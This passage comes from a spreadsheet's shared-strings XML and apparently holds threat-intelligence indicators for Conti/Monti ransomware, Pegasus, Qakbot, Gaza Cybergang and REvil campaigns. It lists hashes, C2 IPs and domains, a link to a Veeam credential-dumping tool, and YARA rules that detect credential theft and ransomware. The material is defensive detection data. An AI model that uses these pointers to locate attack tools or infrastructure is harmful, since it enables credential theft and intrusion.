    <t>158dcb26239a5db7a0eb67826178f1eaa0852d9d86e59afb86f04e88096a19bc</t>
  </si>
  <si>
    <t>1662991498</t>
  </si>
  <si>
    <t>https://github.com/sadshade/veeam-creds</t>
  </si>
  <si>
    <t>imphash</t>
  </si>
  <si>
    <t>1662990862</t>
  </si>
  <si>
    <t>5036747c069c42a5e12c38d94db67fad</t>
  </si>
  <si>
    <t>other Conti samples with the same import table hash</t>
  </si>
  <si>
    <t>1662991466</t>
  </si>
  <si>
    <t>dropmefiles.com.ua</t>
  </si>
  <si>
    <t>1662990432</t>
  </si>
  <si>
    <t>action1_agent.exe</t>
  </si>
  <si>
    <t>1662989357</t>
  </si>
  <si>
    <t>CVE-2021-44228</t>
  </si>
  <si>
    <t>The threat actor apparently intruded via an exploitation of the well-known “Log4Shell” vulnerability</t>
  </si>
  <si>
    <t>1662991537</t>
  </si>
  <si>
    <t>veeamp.pdb</t>
  </si>
  <si>
    <t>1662990782</t>
  </si>
  <si>
    <t>locker.exe</t>
  </si>
  <si>
    <t>ransomware payload</t>
  </si>
  <si>
    <t>1662990797</t>
  </si>
  <si>
    <t>temp.sh</t>
  </si>
  <si>
    <t>1662990461</t>
  </si>
  <si>
    <t>action1_remote.exe</t>
  </si>
  <si>
    <t>1662991274</t>
  </si>
  <si>
    <t>rule monti_ransom {_x005F_x000D_
      meta:_x005F_x000D_
            description = "Detects ChaCha8 encrypted 'MONTI Strain' text (using all-zero key and nonce) embedded in ransomware payload"_x005F_x000D_
            author = "BlackBerry Threat Research Team"_x005F_x000D_
            date = "August 15, 2021"_x005F_x000D_
            license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research &amp; Intelligence Team"_x005F_x000D_
_x005F_x000D_
      strings:_x005F_x000D_
            $s = {20 19 57 65 03 62 D0 AE F4 D1 68}_x005F_x000D_
_x005F_x000D_
      condition:_x005F_x000D_
            uint16be(0) == 0x4d5a and filesize &lt; 2MB_x005F_x000D_
            and $s_x005F_x000D_
}</t>
  </si>
  <si>
    <t>1662991290</t>
  </si>
  <si>
    <t>rule veeam_dumper {_x005F_x000D_
      meta:_x005F_x000D_
            description = "Detects Veeam credential Dumper"_x005F_x000D_
            author = "BlackBerry Threat Research Team"_x005F_x000D_
            date = "August 15, 2021"_x005F_x000D_
            license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research &amp; Intelligence Team"_x005F_x000D_
      strings:_x005F_x000D_
            $s1 = "SqlCommand" fullword ascii wide_x005F_x000D_
            $s2 = "SqlConnection" fullword ascii wide_x005F_x000D_
            $s3 = "SqlDataReader" fullword ascii wide_x005F_x000D_
            $s4 = "veeamp.exe" fullword ascii wide_x005F_x000D_
            $s5 = "veeamp.pdb" fullword ascii wide_x005F_x000D_
_x005F_x000D_
      condition:_x005F_x000D_
            uint16be(0) == 0x4d5a and filesize &lt; 60KB_x005F_x000D_
            and 4 of them_x005F_x000D_
}</t>
  </si>
  <si>
    <t>1662991105</t>
  </si>
  <si>
    <t>9aa1f37517458d635eae4f9b43cb4770880ea0ee171e7e4ad155bbdee0cbe732</t>
  </si>
  <si>
    <t>b518cba2-fa7e-4490-944b-d3cee060702a</t>
  </si>
  <si>
    <t>1662991117</t>
  </si>
  <si>
    <t>veeamp.exe</t>
  </si>
  <si>
    <t>1662991356</t>
  </si>
  <si>
    <t>69493640-7f28-4372-8535-076261c985a5</t>
  </si>
  <si>
    <t>1662991390</t>
  </si>
  <si>
    <t>1d48db0b-2cfc-4830-892a-6c611a9c6a81</t>
  </si>
  <si>
    <t>1642676169</t>
  </si>
  <si>
    <t>1642676789</t>
  </si>
  <si>
    <t>the majority of “anomalous” samples were configured to use SMTP-based (rather than FTP or HTTP(s)) C2s as a one-way communication channel,</t>
  </si>
  <si>
    <t>Campaigns abusing corporate trusted infrastructure hunt for corporate credentials on ICS networks</t>
  </si>
  <si>
    <t>ICS-CSIRT.io</t>
  </si>
  <si>
    <t>1642676774</t>
  </si>
  <si>
    <t>105.112.101.7</t>
  </si>
  <si>
    <t>Infrastructure IPs</t>
  </si>
  <si>
    <t>1642676775</t>
  </si>
  <si>
    <t>105.112.102.213</t>
  </si>
  <si>
    <t>105.112.107.100</t>
  </si>
  <si>
    <t>105.112.109.252</t>
  </si>
  <si>
    <t>105.112.113.164</t>
  </si>
  <si>
    <t>105.112.113.250</t>
  </si>
  <si>
    <t>105.112.114.120</t>
  </si>
  <si>
    <t>105.112.115.230</t>
  </si>
  <si>
    <t>105.112.115.4</t>
  </si>
  <si>
    <t>105.112.117.199</t>
  </si>
  <si>
    <t>105.112.121.59</t>
  </si>
  <si>
    <t>105.112.144.173</t>
  </si>
  <si>
    <t>105.112.144.56</t>
  </si>
  <si>
    <t>105.112.144.77</t>
  </si>
  <si>
    <t>105.112.145.6</t>
  </si>
  <si>
    <t>105.112.147.156</t>
  </si>
  <si>
    <t>105.112.147.20</t>
  </si>
  <si>
    <t>105.112.148.252</t>
  </si>
  <si>
    <t>105.112.148.60</t>
  </si>
  <si>
    <t>105.112.150.35</t>
  </si>
  <si>
    <t>105.112.178.164</t>
  </si>
  <si>
    <t>105.112.26.202</t>
  </si>
  <si>
    <t>1642676776</t>
  </si>
  <si>
    <t>105.112.32.44</t>
  </si>
  <si>
    <t>105.112.33.155</t>
  </si>
  <si>
    <t>105.112.33.233</t>
  </si>
  <si>
    <t>105.112.33.40</t>
  </si>
  <si>
    <t>105.112.35.117</t>
  </si>
  <si>
    <t>105.112.37.192</t>
  </si>
  <si>
    <t>105.112.37.193</t>
  </si>
  <si>
    <t>105.112.37.222</t>
  </si>
  <si>
    <t>105.112.38.173</t>
  </si>
  <si>
    <t>105.112.38.201</t>
  </si>
  <si>
    <t>105.112.38.218</t>
  </si>
  <si>
    <t>105.112.38.249</t>
  </si>
  <si>
    <t>105.112.39.130</t>
  </si>
  <si>
    <t>105.112.39.167</t>
  </si>
  <si>
    <t>105.112.41.0</t>
  </si>
  <si>
    <t>105.112.41.149</t>
  </si>
  <si>
    <t>105.112.46.233</t>
  </si>
  <si>
    <t>105.112.46.38</t>
  </si>
  <si>
    <t>105.112.50.73</t>
  </si>
  <si>
    <t>105.112.50.80</t>
  </si>
  <si>
    <t>1642676781</t>
  </si>
  <si>
    <t>https://ics-cert.kaspersky.com/publications/reports/2022/1/19/campaigns-abusing-corporate-trusted-infrastructure-hunt-for-corporate-credentials-on-ics-networks/</t>
  </si>
  <si>
    <t>1611865983</t>
  </si>
  <si>
    <t>1611866056</t>
  </si>
  <si>
    <t>17cd3c11fba639c1fe987a79a1b998afe741636ac607254cc134eea02c63f658</t>
  </si>
  <si>
    <t>TA551 (Shathak) Word docs push Qakbot (Qbot)</t>
  </si>
  <si>
    <t>231b081480a80b05d69ed1d2e18ada8a1fd85ba6ce3e69cc8f630ede5ce5400e</t>
  </si>
  <si>
    <t>https://isc.sans.edu/forums/diary/TA551+Shathak+Word+docs+push+Qakbot+Qbot/27030/</t>
  </si>
  <si>
    <t>1630524909</t>
  </si>
  <si>
    <t>1630525765</t>
  </si>
  <si>
    <t>172.105.89.243</t>
  </si>
  <si>
    <t>Infection server</t>
  </si>
  <si>
    <t>Bahraini Government Hacks Activists with NSO Group Zero-Click iPhone Exploits</t>
  </si>
  <si>
    <t>64.227.121.213</t>
  </si>
  <si>
    <t>Pegasus C&amp;C</t>
  </si>
  <si>
    <t>206.189.31.108</t>
  </si>
  <si>
    <t>195.181.213.122</t>
  </si>
  <si>
    <t>80.211.231.5</t>
  </si>
  <si>
    <t>hooklevel.com</t>
  </si>
  <si>
    <t>1630524933</t>
  </si>
  <si>
    <t>api1r3f4.redirectweburl.com</t>
  </si>
  <si>
    <t>1630525236</t>
  </si>
  <si>
    <t>info-update.org</t>
  </si>
  <si>
    <t>start-anew.net</t>
  </si>
  <si>
    <t>Pegasus decoy</t>
  </si>
  <si>
    <t>1630525279</t>
  </si>
  <si>
    <t>While maintenance:</t>
  </si>
  <si>
    <t>Maintenance decoy</t>
  </si>
  <si>
    <t>Working hard to create a new website design. Stay in touch!</t>
  </si>
  <si>
    <t>1630525334</t>
  </si>
  <si>
    <t>209.250.237.55</t>
  </si>
  <si>
    <t>youneedjelly.net</t>
  </si>
  <si>
    <t>92.222.71.144</t>
  </si>
  <si>
    <t>visiblereminder.net</t>
  </si>
  <si>
    <t>reunionlove.net</t>
  </si>
  <si>
    <t>New Pegasus infrastructure</t>
  </si>
  <si>
    <t>news-now.co</t>
  </si>
  <si>
    <t>helpusfind.biz</t>
  </si>
  <si>
    <t>1630525440</t>
  </si>
  <si>
    <t>human-rights-news.com</t>
  </si>
  <si>
    <t>Websites linked to Pegasus</t>
  </si>
  <si>
    <t>washington-today.com</t>
  </si>
  <si>
    <t>i-election-online.com</t>
  </si>
  <si>
    <t>breakingnewyork.info</t>
  </si>
  <si>
    <t>siyasimehbus.com</t>
  </si>
  <si>
    <t>mitinq23fevral.info</t>
  </si>
  <si>
    <t>1630525663</t>
  </si>
  <si>
    <t>https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/</t>
  </si>
  <si>
    <t>1509357800</t>
  </si>
  <si>
    <t>1509357837</t>
  </si>
  <si>
    <t>moreoffer.life</t>
  </si>
  <si>
    <t>4</t>
  </si>
  <si>
    <t>Gaza Cybergang â€“ updated 2017 activity</t>
  </si>
  <si>
    <t>signup.updatesforme.club</t>
  </si>
  <si>
    <t>ping.topsite.life</t>
  </si>
  <si>
    <t>alasra-paper.duckdns.org</t>
  </si>
  <si>
    <t>hamas-wathaq.duckdns.org</t>
  </si>
  <si>
    <t>download.data-server.cloudns.club</t>
  </si>
  <si>
    <t>upgrade.newshelpyou.com</t>
  </si>
  <si>
    <t>manual.newphoneapp.com</t>
  </si>
  <si>
    <t>hnoor.newphoneapp.com</t>
  </si>
  <si>
    <t>lol.mynetav.org</t>
  </si>
  <si>
    <t>138.68.242.68</t>
  </si>
  <si>
    <t>185.86.149.168</t>
  </si>
  <si>
    <t>185.11.146.68</t>
  </si>
  <si>
    <t>45.32.84.66</t>
  </si>
  <si>
    <t>45.32.71.95</t>
  </si>
  <si>
    <t>107.161.27.158</t>
  </si>
  <si>
    <t>46.246.87.74</t>
  </si>
  <si>
    <t>87a67371770fda4c2650564cbb00934d</t>
  </si>
  <si>
    <t>4f3b1a2088e473c7d2373849deb4536f</t>
  </si>
  <si>
    <t>c078743eac33df15af2d9a4f24159500</t>
  </si>
  <si>
    <t>3ff60c100b67697163291690e0c2c2b7</t>
  </si>
  <si>
    <t>a3de096598e3c9c8f3ab194edc4caa76</t>
  </si>
  <si>
    <t>7d3426d8eb70e4486e803afb3eeac14f</t>
  </si>
  <si>
    <t>3f67231f30fa742138e713085e1279a6</t>
  </si>
  <si>
    <t>552796e71f7ff304f91b39f5da46499b</t>
  </si>
  <si>
    <t>6fba58b9f9496cc52e78379de9f7f24e</t>
  </si>
  <si>
    <t>eb521caebcf03df561443194c37911a5</t>
  </si>
  <si>
    <t>b68fcf8feb35a00362758fc0f92f7c2e</t>
  </si>
  <si>
    <t>d87c872869023911494305ef4acbd966</t>
  </si>
  <si>
    <t>66f144be4d4ef9c83bea528a4cd3baf3</t>
  </si>
  <si>
    <t>b7390bc8c8a9a71a69ce4cc0c928153b</t>
  </si>
  <si>
    <t>f43188accfb6923d62fe265d6d9c0940</t>
  </si>
  <si>
    <t>056d83c1c1b5f905d18b3c5d58ff5342</t>
  </si>
  <si>
    <t>0ee4757ab9040a95e035a667457e4bc6</t>
  </si>
  <si>
    <t>7bef124131ffc2ef3db349b980e52847</t>
  </si>
  <si>
    <t>70d03e34cadb0f1e1bc6f4bf8486e4e8</t>
  </si>
  <si>
    <t>67f48fd24bae3e63b29edccc524f4096</t>
  </si>
  <si>
    <t>7b536c348a21c309605fa2cd2860a41d</t>
  </si>
  <si>
    <t>cf9d89061917e9f48481db80e674f0e9</t>
  </si>
  <si>
    <t>6d6f34f7cfcb64e44d67638a2f33d619</t>
  </si>
  <si>
    <t>86a89693a273d6962825cf1846c3b6ce</t>
  </si>
  <si>
    <t>5472d0554a0188c0ecebd065eddb9485</t>
  </si>
  <si>
    <t>0b6fe466a3ba36895208e754b155a193780c79ba8b5c1c9f02c4f7e479116e5f</t>
  </si>
  <si>
    <t>0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a</t>
  </si>
  <si>
    <t>0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa</t>
  </si>
  <si>
    <t>1f2b128d26a58a572ea1faee2c4d9dc759eb8add16d9ad0547b3f0305fea212a</t>
  </si>
  <si>
    <t>205f32cc717c2d82baeff9ff5aa9fc31967b6ae5cde22fafe14aec9c9ec62acc</t>
  </si>
  <si>
    <t>284af7a2fafdbff3bbc28b9075f469d2352758b62d182b0e056d29ee74688126</t>
  </si>
  <si>
    <t>344dc6ece5a6dacce9050a65305d4b34865756051a6f414477b6fa381e1c1b63</t>
  </si>
  <si>
    <t>42e4298f5162aba825309673187e27121e3f918238e81f3a6e021c03f3455154</t>
  </si>
  <si>
    <t>1509357801</t>
  </si>
  <si>
    <t>44a8d0561a9cc6e24d6935ff4c35b7b7db50c4001eb01c48ea1cfd13253bc694</t>
  </si>
  <si>
    <t>57a12f20c6bbd69b93e76d6d5a31d720046b498aa880b95b85a4f3fda28aac4f</t>
  </si>
  <si>
    <t>72b039550d31afaeee11dedf7d80333aeda5c504272d426ae0d91bc0cd82c5b0</t>
  </si>
  <si>
    <t>72d2ad8f38e60c23c96698149507fc627664a5706a4431b96014fbf25495b529</t>
  </si>
  <si>
    <t>788f7fd06030f87d411c61efbc52a3efca03359570353da209b2ce4ccf5b4b70</t>
  </si>
  <si>
    <t>7fcac2f18a8844e4af9f923891cfb6f637a99195a457b6cdb916926d709c6a04</t>
  </si>
  <si>
    <t>84adba3c81ad1c2a8285c31d1171f6f671492d9f3ed5ee2c7af326a9a8dc5278</t>
  </si>
  <si>
    <t>852ccc491204f227c3da58a00f53846296454d124b23021bdb168798c8eee2fb</t>
  </si>
  <si>
    <t>86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806</t>
  </si>
  <si>
    <t>9347a47d63b29c96a4f39b201537d844e249ac50ded388d66f47adc4e0880c7e</t>
  </si>
  <si>
    <t>b597d7b5b9c2f1962257f912e911961ad0da4c28fc6a90a0b7db4e242aa007d8</t>
  </si>
  <si>
    <t>bfb88878a22c23138a67cc25872e82d77e54036b846067ddc43e988c50379915</t>
  </si>
  <si>
    <t>c23f715c8588c8d8725352ed515749389d898996107132b2d25749a4efc82a90</t>
  </si>
  <si>
    <t>c47bc2c15f08655d158bb8c9d5254c804c9b6faded526be6879fa94ea4a64f72</t>
  </si>
  <si>
    <t>db53b35c80e8ec3f8782c4d34c83389e8e9b837a6b3cc700c1b566e4e4450ec2</t>
  </si>
  <si>
    <t>dd9debe517717552d7422b08a477faa01badbcc4074830c080a1a1c763e1a544</t>
  </si>
  <si>
    <t>b800d29d6e1f2f85c5bc036e927c1dae745a3c646389599b0754592d76b5564b</t>
  </si>
  <si>
    <t>1509357819</t>
  </si>
  <si>
    <t>https://securelist.com/gaza-cybergang-updated-2017-activity/82765/</t>
  </si>
  <si>
    <t>1599553465</t>
  </si>
  <si>
    <t>1628670769</t>
  </si>
  <si>
    <t>boosthybrid.com.au</t>
  </si>
  <si>
    <t>Banco Estado Chile REvil attack</t>
  </si>
  <si>
    <t>makeitcount.at</t>
  </si>
  <si>
    <t>danubecloud.com</t>
  </si>
  <si>
    <t>takeflat.com</t>
  </si>
  <si>
    <t>new.devon.gov.uk</t>
  </si>
  <si>
    <t>huesges-gruppe.de</t>
  </si>
  <si>
    <t>theclubms.com</t>
  </si>
  <si>
    <t>hoteledenpadova.it</t>
  </si>
  <si>
    <t>plastidip.com.ar</t>
  </si>
  <si>
    <t>zimmerei-fl.de</t>
  </si>
  <si>
    <t>whittier5k.com</t>
  </si>
  <si>
    <t>cityorchardhtx.com</t>
  </si>
  <si>
    <t>greenko.pl</t>
  </si>
  <si>
    <t>eadsmurraypugh.com</t>
  </si>
  <si>
    <t>yousay.site</t>
  </si>
  <si>
    <t>autopfand24.de</t>
  </si>
  <si>
    <t>artotelamsterdam.com</t>
  </si>
  <si>
    <t>ftlc.es</t>
  </si>
  <si>
    <t>1625499504</t>
  </si>
  <si>
    <t>waywithwords.net</t>
  </si>
  <si>
    <t>skanah.com</t>
  </si>
  <si>
    <t>unetica.fr</t>
  </si>
  <si>
    <t>rksbusiness.com</t>
  </si>
  <si>
    <t>simpliza.com</t>
  </si>
  <si>
    <t>ora-it.de</t>
  </si>
  <si>
    <t>geekwork.pl</t>
  </si>
  <si>
    <t>faroairporttransfers.net</t>
  </si>
  <si>
    <t>microcirc.net</t>
  </si>
  <si>
    <t>uimaan.fi</t>
  </si>
  <si>
    <t>peterstrobos.com</t>
  </si>
  <si>
    <t>wychowanieprzedszkolne.pl</t>
  </si>
  <si>
    <t>marietteaernoudts.nl</t>
  </si>
  <si>
    <t>lichencafe.com</t>
  </si>
  <si>
    <t>withahmed.com</t>
  </si>
  <si>
    <t>fundaciongregal.org</t>
  </si>
  <si>
    <t>zervicethai.co.th</t>
  </si>
  <si>
    <t>zso-mannheim.de</t>
  </si>
  <si>
    <t>compliancesolutionsstrategies.com</t>
  </si>
  <si>
    <t>retroearthstudio.com</t>
  </si>
  <si>
    <t>corelifenutrition.com</t>
  </si>
  <si>
    <t>maasreusel.nl</t>
  </si>
  <si>
    <t>consultaractadenacimiento.com</t>
  </si>
  <si>
    <t>deprobatehelp.com</t>
  </si>
  <si>
    <t>effortlesspromo.com</t>
  </si>
  <si>
    <t>enovos.de</t>
  </si>
  <si>
    <t>globedivers.wordpress.com</t>
  </si>
  <si>
    <t>bastutunnan.se</t>
  </si>
  <si>
    <t>atmos-show.com</t>
  </si>
  <si>
    <t>surespark.org.uk</t>
  </si>
  <si>
    <t>radaradvies.nl</t>
  </si>
  <si>
    <t>em-gmbh.ch</t>
  </si>
  <si>
    <t>idemblogs.com</t>
  </si>
  <si>
    <t>iyengaryogacharlotte.com</t>
  </si>
  <si>
    <t>wien-mitte.co.at</t>
  </si>
  <si>
    <t>sweering.fr</t>
  </si>
  <si>
    <t>huehnerauge-entfernen.de</t>
  </si>
  <si>
    <t>ihr-news.jp</t>
  </si>
  <si>
    <t>mikeramirezcpa.com</t>
  </si>
  <si>
    <t>parkcf.nl</t>
  </si>
  <si>
    <t>sla-paris.com</t>
  </si>
  <si>
    <t>parkstreetauto.net</t>
  </si>
  <si>
    <t>sexandfessenjoon.wordpress.com</t>
  </si>
  <si>
    <t>maratonaclubedeportugal.com</t>
  </si>
  <si>
    <t>mylovelybluesky.com</t>
  </si>
  <si>
    <t>connectedace.com</t>
  </si>
  <si>
    <t>asiluxury.com</t>
  </si>
  <si>
    <t>wari.com.pe</t>
  </si>
  <si>
    <t>1599553466</t>
  </si>
  <si>
    <t>dutchbrewingcoffee.com</t>
  </si>
  <si>
    <t>amylendscrestview.com</t>
  </si>
  <si>
    <t>minipara.com</t>
  </si>
  <si>
    <t>rocketccw.com</t>
  </si>
  <si>
    <t>wacochamber.com</t>
  </si>
  <si>
    <t>anybookreader.de</t>
  </si>
  <si>
    <t>rimborsobancario.net</t>
  </si>
  <si>
    <t>heurigen-bauer.at</t>
  </si>
  <si>
    <t>purposeadvisorsolutions.com</t>
  </si>
  <si>
    <t>y-archive.com</t>
  </si>
  <si>
    <t>paulisdogshop.de</t>
  </si>
  <si>
    <t>navyfederalautooverseas.com</t>
  </si>
  <si>
    <t>aco-media.nl</t>
  </si>
  <si>
    <t>spsshomeworkhelp.com</t>
  </si>
  <si>
    <t>tomaso.gr</t>
  </si>
  <si>
    <t>upmrkt.co</t>
  </si>
  <si>
    <t>spacecitysisters.org</t>
  </si>
  <si>
    <t>drinkseed.com</t>
  </si>
  <si>
    <t>forskolorna.org</t>
  </si>
  <si>
    <t>zewatchers.com</t>
  </si>
  <si>
    <t>fannmedias.com</t>
  </si>
  <si>
    <t>spd-ehningen.de</t>
  </si>
  <si>
    <t>ohidesign.com</t>
  </si>
  <si>
    <t>creative-waves.co.uk</t>
  </si>
  <si>
    <t>desert-trails.com</t>
  </si>
  <si>
    <t>troegs.com</t>
  </si>
  <si>
    <t>abogadoengijon.es</t>
  </si>
  <si>
    <t>the-virtualizer.com</t>
  </si>
  <si>
    <t>urmasiimariiuniri.ro</t>
  </si>
  <si>
    <t>castillobalduz.es</t>
  </si>
  <si>
    <t>rafaut.com</t>
  </si>
  <si>
    <t>rollingrockcolumbia.com</t>
  </si>
  <si>
    <t>dekkinngay.com</t>
  </si>
  <si>
    <t>restaurantesszimmer.de</t>
  </si>
  <si>
    <t>mylolis.com</t>
  </si>
  <si>
    <t>caribdoctor.org</t>
  </si>
  <si>
    <t>cirugiauretra.es</t>
  </si>
  <si>
    <t>eglectonk.online</t>
  </si>
  <si>
    <t>colorofhorses.com</t>
  </si>
  <si>
    <t>smokeysstoves.com</t>
  </si>
  <si>
    <t>thewellnessmimi.com</t>
  </si>
  <si>
    <t>hellohope.com</t>
  </si>
  <si>
    <t>1team.es</t>
  </si>
  <si>
    <t>alten-mebel63.ru</t>
  </si>
  <si>
    <t>dw-css.de</t>
  </si>
  <si>
    <t>teczowadolina.bytom.pl</t>
  </si>
  <si>
    <t>tenacitytenfold.com</t>
  </si>
  <si>
    <t>drugdevice.org</t>
  </si>
  <si>
    <t>toponlinecasinosuk.co.uk</t>
  </si>
  <si>
    <t>iwelt.de</t>
  </si>
  <si>
    <t>thailandholic.com</t>
  </si>
  <si>
    <t>hkr-reise.de</t>
  </si>
  <si>
    <t>schlafsack-test.net</t>
  </si>
  <si>
    <t>mirjamholleman.nl</t>
  </si>
  <si>
    <t>xn--rumung-bua.online</t>
  </si>
  <si>
    <t>vannesteconstruct.be</t>
  </si>
  <si>
    <t>chrissieperry.com</t>
  </si>
  <si>
    <t>brevitempore.net</t>
  </si>
  <si>
    <t>nuzech.com</t>
  </si>
  <si>
    <t>sloverse.com</t>
  </si>
  <si>
    <t>xn--vrftet-pua.biz</t>
  </si>
  <si>
    <t>1626105767</t>
  </si>
  <si>
    <t>humancondition.com</t>
  </si>
  <si>
    <t>mooshine.com</t>
  </si>
  <si>
    <t>alfa-stroy72.com</t>
  </si>
  <si>
    <t>offroadbeasts.com</t>
  </si>
  <si>
    <t>americafirstcommittee.org</t>
  </si>
  <si>
    <t>lapinvihreat.fi</t>
  </si>
  <si>
    <t>chatizel-paysage.fr</t>
  </si>
  <si>
    <t>deepsouthclothingcompany.com</t>
  </si>
  <si>
    <t>allfortheloveofyou.com</t>
  </si>
  <si>
    <t>rushhourappliances.com</t>
  </si>
  <si>
    <t>international-sound-awards.com</t>
  </si>
  <si>
    <t>aodaichandung.com</t>
  </si>
  <si>
    <t>nandistribution.nl</t>
  </si>
  <si>
    <t>lebellevue.fr</t>
  </si>
  <si>
    <t>camsadviser.com</t>
  </si>
  <si>
    <t>highimpactoutdoors.net</t>
  </si>
  <si>
    <t>brandl-blumen.de</t>
  </si>
  <si>
    <t>parking.netgateway.eu</t>
  </si>
  <si>
    <t>modamilyon.com</t>
  </si>
  <si>
    <t>cafemattmeera.com</t>
  </si>
  <si>
    <t>csgospeltips.se</t>
  </si>
  <si>
    <t>bauertree.com</t>
  </si>
  <si>
    <t>gratispresent.se</t>
  </si>
  <si>
    <t>solerluethi-allart.ch</t>
  </si>
  <si>
    <t>tophumanservicescourses.com</t>
  </si>
  <si>
    <t>siliconbeach-realestate.com</t>
  </si>
  <si>
    <t>marketingsulweb.com</t>
  </si>
  <si>
    <t>hotelzentral.at</t>
  </si>
  <si>
    <t>hmsdanmark.dk</t>
  </si>
  <si>
    <t>walter-lemm.de</t>
  </si>
  <si>
    <t>softsproductkey.com</t>
  </si>
  <si>
    <t>andersongilmour.co.uk</t>
  </si>
  <si>
    <t>rota-installations.co.uk</t>
  </si>
  <si>
    <t>talentwunder.com</t>
  </si>
  <si>
    <t>boulderwelt-muenchen-west.de</t>
  </si>
  <si>
    <t>corona-handles.com</t>
  </si>
  <si>
    <t>euro-trend.pl</t>
  </si>
  <si>
    <t>syndikat-asphaltfieber.de</t>
  </si>
  <si>
    <t>kamahouse.net</t>
  </si>
  <si>
    <t>cuppacap.com</t>
  </si>
  <si>
    <t>cursoporcelanatoliquido.online</t>
  </si>
  <si>
    <t>videomarketing.pro</t>
  </si>
  <si>
    <t>mmgdouai.fr</t>
  </si>
  <si>
    <t>theduke.de</t>
  </si>
  <si>
    <t>gastsicht.de</t>
  </si>
  <si>
    <t>pridoxmaterieel.nl</t>
  </si>
  <si>
    <t>101gowrie.com</t>
  </si>
  <si>
    <t>echtveilig.nl</t>
  </si>
  <si>
    <t>promesapuertorico.com</t>
  </si>
  <si>
    <t>caribbeansunpoker.com</t>
  </si>
  <si>
    <t>lorenacarnero.com</t>
  </si>
  <si>
    <t>romeguidedvisit.com</t>
  </si>
  <si>
    <t>acomprarseguidores.com</t>
  </si>
  <si>
    <t>dareckleyministries.com</t>
  </si>
  <si>
    <t>darrenkeslerministries.com</t>
  </si>
  <si>
    <t>myzk.site</t>
  </si>
  <si>
    <t>sotsioloogia.ee</t>
  </si>
  <si>
    <t>erstatningsadvokaterne.dk</t>
  </si>
  <si>
    <t>work2live.de</t>
  </si>
  <si>
    <t>micro-automation.de</t>
  </si>
  <si>
    <t>cleliaekiko.online</t>
  </si>
  <si>
    <t>wasmachtmeinfonds.at</t>
  </si>
  <si>
    <t>airconditioning-waalwijk.nl</t>
  </si>
  <si>
    <t>podsosnami.ru</t>
  </si>
  <si>
    <t>micahkoleoso.de</t>
  </si>
  <si>
    <t>berliner-versicherungsvergleich.de</t>
  </si>
  <si>
    <t>punchbaby.com</t>
  </si>
  <si>
    <t>oncarrot.com</t>
  </si>
  <si>
    <t>kedak.de</t>
  </si>
  <si>
    <t>fotoscondron.com</t>
  </si>
  <si>
    <t>themadbotter.com</t>
  </si>
  <si>
    <t>body-armour.online</t>
  </si>
  <si>
    <t>insp.bi</t>
  </si>
  <si>
    <t>physiofischer.de</t>
  </si>
  <si>
    <t>space.ua</t>
  </si>
  <si>
    <t>lachofikschiet.nl</t>
  </si>
  <si>
    <t>phantastyk.com</t>
  </si>
  <si>
    <t>dezatec.es</t>
  </si>
  <si>
    <t>charlottepoudroux-photographie.fr</t>
  </si>
  <si>
    <t>associationanalytics.com</t>
  </si>
  <si>
    <t>vox-surveys.com</t>
  </si>
  <si>
    <t>daniel-akermann-architektur-und-planung.ch</t>
  </si>
  <si>
    <t>hugoversichert.de</t>
  </si>
  <si>
    <t>assurancesalextrespaille.fr</t>
  </si>
  <si>
    <t>latestmodsapks.com</t>
  </si>
  <si>
    <t>embracinghiscall.com</t>
  </si>
  <si>
    <t>webcodingstudio.com</t>
  </si>
  <si>
    <t>kafu.ch</t>
  </si>
  <si>
    <t>digivod.de</t>
  </si>
  <si>
    <t>dinslips.se</t>
  </si>
  <si>
    <t>mapawood.com</t>
  </si>
  <si>
    <t>theapifactory.com</t>
  </si>
  <si>
    <t>michaelsmeriglioracing.com</t>
  </si>
  <si>
    <t>piajeppesen.dk</t>
  </si>
  <si>
    <t>mastertechengineering.com</t>
  </si>
  <si>
    <t>smart-light.co.uk</t>
  </si>
  <si>
    <t>lefumetdesdombes.com</t>
  </si>
  <si>
    <t>antiaginghealthbenefits.com</t>
  </si>
  <si>
    <t>jameskibbie.com</t>
  </si>
  <si>
    <t>coding-machine.com</t>
  </si>
  <si>
    <t>mediaclan.info</t>
  </si>
  <si>
    <t>sairaku.net</t>
  </si>
  <si>
    <t>systemate.dk</t>
  </si>
  <si>
    <t>comparatif-lave-linge.fr</t>
  </si>
  <si>
    <t>craigmccabe.fun</t>
  </si>
  <si>
    <t>gantungankunciakrilikbandung.com</t>
  </si>
  <si>
    <t>herbstfeststaefa.ch</t>
  </si>
  <si>
    <t>iwr.nl</t>
  </si>
  <si>
    <t>buroludo.nl</t>
  </si>
  <si>
    <t>innote.fi</t>
  </si>
  <si>
    <t>bestbet.com</t>
  </si>
  <si>
    <t>carlosja.com</t>
  </si>
  <si>
    <t>365questions.org</t>
  </si>
  <si>
    <t>milltimber.aberdeen.sch.uk</t>
  </si>
  <si>
    <t>promalaga.es</t>
  </si>
  <si>
    <t>all-turtles.com</t>
  </si>
  <si>
    <t>alvinschwartz.wordpress.com</t>
  </si>
  <si>
    <t>socstrp.org</t>
  </si>
  <si>
    <t>gopackapp.com</t>
  </si>
  <si>
    <t>makeurvoiceheard.com</t>
  </si>
  <si>
    <t>mariposapropaneaz.com</t>
  </si>
  <si>
    <t>slashdb.com</t>
  </si>
  <si>
    <t>shsthepapercut.com</t>
  </si>
  <si>
    <t>katiekerr.co.uk</t>
  </si>
  <si>
    <t>bigbaguettes.eu</t>
  </si>
  <si>
    <t>transliminaltribe.wordpress.com</t>
  </si>
  <si>
    <t>cortec-neuro.com</t>
  </si>
  <si>
    <t>smejump.co.th</t>
  </si>
  <si>
    <t>zimmerei-deboer.de</t>
  </si>
  <si>
    <t>newstap.com.ng</t>
  </si>
  <si>
    <t>vetapharma.fr</t>
  </si>
  <si>
    <t>manifestinglab.com</t>
  </si>
  <si>
    <t>onlybacklink.com</t>
  </si>
  <si>
    <t>sandd.nl</t>
  </si>
  <si>
    <t>trulynolen.co.uk</t>
  </si>
  <si>
    <t>live-con-arte.de</t>
  </si>
  <si>
    <t>fitnessingbyjessica.com</t>
  </si>
